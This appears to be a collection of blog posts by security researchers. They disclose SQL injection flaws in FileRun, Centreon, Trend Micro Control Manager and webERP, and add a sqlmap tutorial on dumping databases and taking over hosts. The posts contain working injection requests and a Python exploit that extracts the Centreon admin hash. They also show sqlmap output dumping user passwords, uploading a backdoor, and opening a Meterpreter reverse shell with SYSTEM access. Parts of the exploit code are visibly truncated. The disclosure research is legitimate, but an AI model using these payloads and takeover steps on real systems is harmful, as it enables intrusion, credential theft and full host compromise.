Blind SQL Injection Vulnerability in FileRun <=2017.09.18

Some time ago while doing a pentest, we found a vulnerability in a file sharing web application named FileRun. This application allows us to access our files anywhere through self-hosted secure cloud storage, backup and sharing files for our photos, videos, files and more.

The Vulnerability

The vulnerability was found after the authentication. After we logged in as any user, go to Search -> Drop down menu -> Search Metadata -> Choose any, for this example I choose Tags. This will generate a POST request to the server like below:

POST /?module=search§ion=ajax&amp;page=grid HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 88
Cookie: FileRunSID=u71u3j1fiqjk1ntmsm7f84d8c4; language=english
Connection: close
Pragma: no-cache
Cache-Control: no-cache


We notice that the metafield parameter might be vulnerable to SQL Injection, therefore we injected a single quote after the value (e.g. metafield=7′) and examined the server response with interesting error below:

HTTP/1.0 500 Internal Server Error
Date: Wed, 20 Sep 2017 09:46:48 GMT
Server: Apache/2.4.7 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Judging to that response, my spider sense was tingling and throwing our awesome and favorite tool for fast confirmation to the metafield parameter.

root@kali:~# sqlmap -u "§ion=ajax&amp;page=grid" --data "metafield=7&amp;searchType=meta&amp;keyword=&amp;searchPath=%2FROOT%2FHOME&amp;path=%252FROOT%252FSEARCH" --cookie "FileRunSID=qpgjv055ne2tluvnp10fao0gl3; language=english" -p metafield --dbms=mysql --level=5 --technique=T --dbs
 ___ ___[,]_____ ___ ___  {1.1.8#stable}
|_ -| . [)]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V          |_|

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 10:49:19

[10:56:03] [INFO] testing connection to the target URL
[10:56:03] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[10:56:03] [WARNING] heuristic (basic) test shows that POST parameter 'metafield' might not be injectable
[10:56:03] [INFO] testing for SQL injection on POST parameter 'metafield'
[10:56:03] [INFO] testing 'MySQL &gt;= 5.0.12 AND time-based blind'
[10:56:03] [WARNING] time-based comparison requires larger statistical model, please wait............................ (done)
[10:56:04] [INFO] testing 'MySQL &gt;= 5.0.12 AND time-based blind (comment)'
[10:56:04] [INFO] testing 'MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP)'
<strong>[10:56:14] [INFO] POST parameter 'metafield' appears to be 'MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP)' injectable</strong>
for the remaining tests, do you want to include all tests for 'MySQL' extending provided risk (1) value? [Y/n] y
[10:56:18] [INFO] checking if the injection point on POST parameter 'metafield' is a false positive
POST parameter 'metafield' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 154 HTTP(s) requests:
Parameter: metafield (POST)
    Type: AND/OR time-based blind
    Title: MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP)
    Payload: metafield=7) AND (SELECT * FROM (SELECT(SLEEP(5)))uKlV) AND (3045=3045&amp;searchType=meta&amp;keyword=&amp;searchPath=/ROOT/HOME&amp;path=%2FROOT%2FSEARCH
[10:59:27] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7
back-end DBMS: MySQL &gt;= 5.0.12
[10:59:27] [INFO] fetching database names
[10:59:27] [INFO] fetching number of databases
[10:59:27] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
[10:59:28] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
[10:59:39] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
[10:59:45] [INFO] adjusting time delay to 1 second due to good response times
[11:00:42] [INFO] retrieved: <strong>filerun</strong>
available databases [2]:
[*] filerun
[*] information_schema

[11:01:04] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 87 times
[11:01:04] [INFO] fetched data logged to text files under '/root/.sqlmap/output/'

[*] shutting down at 11:01:04

And yes, the vulnerability is confirmed.

Proof of Concept

Here we create a simple script to extract current database using time-based technique.

Patch and Fix

We already contacted FileRun developer, Afian AB, and work closely to disclose this vulnerability. FileRun users are suggested to apply immediate software update to latest version using the installation control panel. Please referring to this docs.


Thanks to Vlad Roman who quickly responded to our emails to take immediate action on this finding. Here is the communication log:

Sept 20, 2017 Initial contact with FileRun team
Sept 22, 2017 Vulnerability acknowledged by FileRun team and said that a patch will be released in a couple of days soon.
Sept 25, 2017 FileRun team released a patch.
Sept 27, 2017 Draft of security advisory document was sent to FileRun team.
Sept 29, 2017 Advisory published.


Centreon Enterprise Server 2.3.3 – 2.3.9-4 Blind SQL Injection

We discovered the vulnerability when we’re looking for alternate software in network monitoring. We know and we love Nagios, and so the Centreon, they provide a very nice interface of Nagios. Centreon provide nice features and ease of use when you’re dealing with network monitoring. The backend system is still Nagios, but the interface is totally different. You can view more features of Centreon here.

Fully Automated Nagios (FAN) also uses Centreon, thus the vulnerability also affects FAN as well.

Our research environment:

  • Centreon Enterprise Server (ces-standard-2.0-i386)
  • Centreon Application (2.3.9-4, latest update)

Vulnerability Overview

The vulnerability is a classic SQL injection, it occurred when an authorized user can see the web interface and have access to menuXML.php, which is by default enable on all user access. By injecting sql command in ‘menu’ parameter within request, let say ‘ AND SLEEP(5) AND ‘meHL’= ‘meHL, the web application response is hung for 5 seconds. It is obvious that the web application is vulnerable to Time-based SQL Injection.

The vulnerable code sits in /usr/share/centreon/www/menu/xml/menuXML.php, which is:

 * Get CSS from menuXML.php
$DBRESULT2 = $pearDB-&gt;query("SELECT css_name FROM `css_color_menu` WHERE menu_nb = '".htmlentities($_GET["menu"], ENT_QUOTES, "UTF-8")."' LIMIT 1");
$menu_style = $DBRESULT2-&gt;fetchRow();

The menu parameter request wasn’t filtered properly, thus can lead to SQL injection after the menu parameter is passed.

Proof of Concept

We create a proof of concept script trying to get the admin hash. Here it goes:

import sys,time,urllib,urllib2

print """
-=] Centreon 2.3.3 - 2.3.9-4 Time-based BlindSQLi Exploit [=-
    [ by modpr0be  - research[at] ]
host = raw_input("(!) We need the target IP: ")
target = 'http://%s/centreon/menu/xml/menuXML.php' %(host)

# sid is the same as PHPSESSID session value, so put the value of PHPSESSID here
sid = raw_input("(!) Put the value of a valid PHPSESSID session: ")
cookie = 'PHPSESSID=%s' %(sid)

# SQLi delay, tested on LAN environment.
# Consider if it's a remote target, you may increase the delay value (default: 1 seconds)

print "(-) Using Time-Based method with %ds delay. This will take some time, go grab a coffee..\n"%int(delay)

def Hex2Des(item):
        return ord(hex(item).replace('0x',''))

def adminhash(m,n):
    #borrow from SQLmap :)
    adminquery=("' AND 9999=IF((ORD(MID((SELECT IFNULL(CAST(contact_passwd AS CHAR),0x20) FROM contact"
           " WHERE contact_id=1 LIMIT 0,1),%s,1)) &gt; %s),SLEEP(%s),9999)  AND 'mEhL'='mEhL" %(m,n,delay))

    value = { 'menu': '2'+adminquery,
              'sid': '%s'%(sid)  }

    url = "%s?%s" %(target,urllib.urlencode(value))
    req = urllib2.Request(url)
    req.add_header('Cookie', cookie)
            response = urllib2.urlopen(req)
            endtime = time.time()
            return int(endtime-starttime)
            print '\n(-) Uh oh! Exploit fail..'

sys.stdout.write('(!) Getting admin password hash: ')

starttime = time.time()
for m in range(1,33):
    for n in range(0,16):
        wkttunggu = adminhash(m,Hex2Des(n))
        if (wkttunggu &lt; delay):
endtime = time.time()
print &quot;\n(-) Done! Admin password hash extracted in %d seconds&quot; %int(endtime-starttime)

You need a valid PHP session for this exploit to work, in other means, you need to login to the web application (guest user is OK!). In this PoC, the valid PHP session are 3uh52mtl1hlmsha4nmkftde5l3.


Currently we are not aware of any practical solution for this vulnerability. But you are suggested to limit access to the Centreon web administration, and verify each user who has access to it.


Thank you to CERT/CC for working with this vulnerability disclosure.
Vulnerability Notes DB on CERT/CC:

Trend Micro Control Manager SQL Injection Vulnerability

Trend Micro Control Manager prior to version 5.5 build 1823 (English and Japanese version) and version 6 build 1449 (English version only) are susceptible to SQL Injection. The application does not properly filter user-supplied input. The successful exploitation of this vulnerability could potentially result in arbitrary SQL command input to the back-end database, such as execute SQL command to upload and execute arbitrary code against the target system.

The vulnerable parameter is ‘id’ parameter in the GET request for AdHocQuery_Processor.aspx page. According to Trend Micro Control Manager help page, an Ad Hoc Query is a direct request to the Control Manager database for information. The query uses data views to narrow the request and improve performance. After specifying the data view, users can further narrow their search by specifying filtering criteria for the request.

Version Affected

Trend Micro Control Manager 5.5 prior to (English and Japanese version)
Trend Micro Control Manager 6 prior to (English version)


An attacker with access to the Trend Micro Control Manager web interface can conduct a SQL injection attack, which could be used to result in information leakage, arbitrary code execution and/or denial of service.


The vendor has stated that these vulnerabilities have been addressed in Trend Micro Control Manager version 5.5 and 6.0 critical patches.

Critical patch available for SQL injection attacks in Control Manager (TMCM)

Control Manager 6 – Product Patch – fragment-4248

Control Manager 5.5 – Product Patch – fragment-1845

Trend Micro Control Manager 5.5 – Patch (Japanese only) – fragment-3462

Proof of Concept


JVN#42014489 –
VU#950795 –


webERP <=4.08.4 SQL Injection Vulnerability


webERP is a mature open-source ERP system providing best practice, multi-user business administration and accounting tools over the web. The vulnerability sits in the WO (work order) parameter, file WorkOrderEntry.php in the Manufacturing menu. Lack of input validation of the WO parameter may allow malicious users to inject an sql query.

Proof of Concept

Time-based Blind SQL Injection

POST /weberp/WorkOrderEntry.php HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: PHPSESSID=n9g1ts0s7oigk88eto8f8nm111
Content-Type: application/x-www-form-urlencoded
Content-Length: 207

FormID=ff60696dab6b35c56558628b7237a624be19ad11&amp;WO=33' AND SLEEP(5) AND '1'='1&amp;StockLocation=MEL&amp;;StartDate=14/09/2012&amp;RequiredBy=14/09/2012&amp;NumberOfOutputs=0&amp;submit=&amp;StockCat=All&amp;Keywords=&amp;StockCode=

Error-based SQL Injection

POST /weberp/WorkOrderEntry.php HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: PHPSESSID=n9g1ts0s7oigk88eto8f8nm111
Content-Type: application/x-www-form-urlencoded
Content-Length: 207



Upgrade to latest version here:


How to: SQLMap (dump and destroy)

SQLMap is the tool to automate SQL Injection vulnerability exploitation. This tool is very popular to exploit the SQL Injection vulnerability. While most of web hacker enthusiast knew about this tool to gather information and retrieves the tables information, i try to share this information about the powerful of SQLMap rather than just as “a database dumper tool”.

I will separate this in 3 section, as a fingerprinter (we already knew this), as an enumerator (of course), and as a destroyer (hmm..?!). Check it out.


root@bt:/pentest/database/sqlmap# ./ --url ""

sqlmap/0.9-dev - automatic SQL injection and database takeover tool

[*] starting at: 22:26:52

[22:26:52] [INFO] using '/pentest/database/sqlmap/output/' as session file
[22:26:52] [INFO] resuming match ratio '0.972' from session file
[22:26:52] [INFO] resuming injection point 'GET' from session file
[22:26:52] [INFO] resuming injection parameter 'id' from session file
[22:26:52] [INFO] resuming injection type 'numeric' from session file
[22:26:52] [INFO] resuming 0 number of parenthesis from session file
[22:26:52] [INFO] resuming back-end DBMS 'mysql 5' from session file
[22:26:52] [INFO] resuming remote absolute path of temporary files directory 'C:/WINDOWS/Temp' from session file
[22:26:52] [INFO] testing connection to the target url
[22:26:52] [INFO] testing for parenthesis on injectable parameter
[22:26:52] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.12, PHP 5.3.0
back-end DBMS: MySQL 5

[*] shutting down at: 22:26:52

Yes, we knew this at all. Dump the database engine, the version, and the operating system information.

Enumerate Database

root@bt:/pentest/database/sqlmap# ./ --url "" --dbs


[22:28:41] [INFO] fetching database names
[22:28:41] [INFO] fetching number of databases
[22:28:41] [INFO] retrieved: 6
[22:28:41] [INFO] retrieved: information_schema
[22:28:44] [INFO] retrieved: cdcol
[22:28:45] [INFO] retrieved: mysql
[22:28:46] [INFO] retrieved: phpmyadmin
[22:28:47] [INFO] retrieved: test
[22:28:48] [INFO] retrieved: webappdb
available databases [6]:
[*] cdcol
[*] information_schema
[*] mysql
[*] phpmyadmin
[*] test
[*] webappdb

Dump the database, yes..SQLMap always do the great stuff!

Enumerate tables

root@bt:/pentest/database/sqlmap# ./ --url "" -D webappdb --tables

[22:32:32] [INFO] fetching tables for database 'webappdb'
[22:32:32] [INFO] fetching number of tables for database 'webappdb'
[22:32:32] [INFO] retrieved: 2
[22:32:33] [INFO] retrieved: guestbook
[22:32:34] [INFO] retrieved: users
Database: webappdb
[2 tables]
| guestbook |
| users     |

Dump the tables

[22:36:54] [INFO] fetching columns for table 'users' on database 'webappdb'
[22:36:54] [INFO] fetching number of columns for table 'users' on database 'webappdb'
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/': 4
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/': id
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/': name
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/': password
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/': country
[22:36:54] [INFO] fetching entries for table 'users' on database 'webappdb'
[22:36:54] [INFO] fetching number of entries for table 'users' on database 'webappdb'
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/': 3
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/': ID
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/': 1
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/': admin
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/': 123456
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/': ID
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/': 2
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/': secret
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/': password
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/': SG
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/': 3
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/': backup
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/': backup12
Database: webappdb
Table: users
[3 entries]
| country | id | name   | password |
| ID      | 1  | admin  | 123456   |
| ID      | 2  | secret | password |
| SG      | 3  | backup | backup12 |

[22:36:54] [INFO] Table 'webappdb.users' dumped to CSV file '/pentest/database/sqlmap/output/'
[22:36:54] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/'

[*] shutting down at: 22:36:54

SQLMap do a great job so far 🙂 Next, take over the system!!

Remote Command Execution

root@bt:/pentest/database/sqlmap#./ --url "" --os-shell

[22:51:25] [INFO] trying to upload the uploader agent

which web application language does the web server support?

[1] ASP (default)
[2] PHP
[3] JSP
[22:51:27] [WARNING] unable to retrieve the web server document root
please provide the web server document root [C:/xampp/htdocs/]:
[22:51:28] [WARNING] unable to retrieve any web server path
please provide any additional web server full path to try to upload the agent [C:/xampp/htdocs/]:
[22:51:28] [INFO] the uploader agent has been successfully uploaded on 'C:/xampp/htdocs/' ('')
[22:51:28] [INFO] the backdoor has probably been successfully uploaded on 'C:/xampp/htdocs/', go with your browser to '' and enjoy it!
[22:51:28] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
&gt;2 ipconfig
do you want to retrieve the command standard output? [Y/n/a] a
command standard output:
Windows IP Configuration
Ethernet adapter Local Area Connection 2:
Connection-specific DNS Suffix  . :
IP Address. . . . . . . . . . . . :
Subnet Mask . . . . . . . . . . . :
Default Gateway . . . . . . . . . :

The Metasploit’s Meterpreter over SQL Injection

root@bt:/pentest/database/sqlmap# ./ --url "" --msf-path=/opt/metasploit3/msf3 --os-pwn

This time, SQLMap will upload an php file contain shell_exec in order to execute arbitrary command to the remote system via php. After uploaded, SQLMap will trigger the msfpayload (Metasploit Payload) to build “portable executable” meterpreter backdoor. It will be encoded and uploaded via php shell.

When uploaded, SQLMap will trigger “Metasploit listener” called Multi/handler and waiting for the “portable exe backdoor” to be executed. After it executed, the meterpreter shell will come up 🙂
I will skip some information here, because it is too long to be dropped here.
—-the process before this line was creating the php shell and upload to document root—–
[22:57:05] [INFO] creating Metasploit Framework 3 payload stager
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535
[3] Bind TCP: Listen on the database host for a connection

which is the local address? []
which local port number do you want to use? [31503]
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
&gt; 1
which payload encoding do you want to use?
[1] No Encoder
[2] Alpha2 Alphanumeric Mixedcase Encoder
[3] Alpha2 Alphanumeric Uppercase Encoder
[4] Avoid UTF8/tolower
[5] Call+4 Dword XOR Encoder
[6] Single-byte XOR Countdown Encoder
[7] Variable-length Fnstenv/mov Dword XOR Encoder
[8] Polymorphic Jump/Call XOR Additive Feedback Encoder
[9] Non-Alpha Encoder
[10] Non-Upper Encoder
[11] Polymorphic XOR Additive Feedback Encoder (default)
[12] Alpha2 Alphanumeric Unicode Mixedcase Encoder
[13] Alpha2 Alphanumeric Unicode Uppercase Encoder
&gt; 11
[22:57:46] [INFO] creation in progress ................ done
[22:58:03] [INFO] compression in progress . done
[22:58:04] [INFO] uploading payload stager to 'C:/xampp/htdocs/tmpmtonj.exe'
[22:58:04] [INFO] running Metasploit Framework 3 command line interface locally, wait..
[*] Please wait while we load the module tree...
[*] Started reverse handler on
[*] Starting the payload handler...
[22:58:27] [INFO] running Metasploit Framework 3 payload stager remotely, wait..
[*] Sending stage (748544 bytes) to
[*] Meterpreter session 1 opened ( -&gt;
meterpreter&gt; Loading extension espia...success.
meterpreter&gt; Loading extension incognito...success.
meterpreter&gt; Loading extension priv...success.
meterpreter&gt; Loading extension sniffer...success.
meterpreter&gt; Computer: XP_FDCC
OS      : Windows XP (Build 2600, Service Pack 3).
Arch    : x86
Language: en_US
meterpreter&gt; Server username: NT AUTHORITYSYSTEM

meterpreter&gt; shell
Process 3128 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.


OS Pwned!